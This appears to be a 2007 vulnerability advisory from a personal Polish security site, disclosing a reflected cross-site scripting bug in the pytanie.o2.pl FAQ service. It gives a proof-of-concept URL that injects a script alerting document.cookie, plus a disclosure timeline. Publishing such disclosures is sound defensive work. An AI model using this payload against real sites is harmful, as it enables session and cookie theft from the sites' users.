Zapraszam na bloga o botnetach i złośliwym oprogramowaniu:
bothunters.pl
kanedaaa... ... borys ... bohater ...
slackware - pakiety
faq
security
public
art
processing
linux moje
tests
linki
stats
start
kaneda@bohater.net
+
Subject:
XSS bug for pytanie.o2.pl
+
Version:
2007.03.04
+
Discovered by:
Kanedaaa: http://kaneda.bohater.net
+
pytanie.o2.pl Description:
pytanie.o2.pl is "FAQ service", a part of o2.pl the most famous Polish web portal.
+
Description:
XSS IN:
http://pytanie.o2.pl/index.php?dzial=faq&nr_site=2&nr_kat=1&nam_kat=Wymagania%3Cscript%3Ealert(document.cookie);%3C/script%3E%20techniczne,%20jak%20zacz%B1%E6%20i%20problemy%20z%20logowaniem
Its nothing special, because this site is without any kind of authentication.
Timeline:
2007.03.04 bug discovered
2007.03.04 "/" bug sent via mail from http://kontakt.o2.pl
Original Advisory:
http://kaneda.bohater.net/security/20070304-xss-pytanie.o2.pl.php
Check my other bugs in security section:
Security
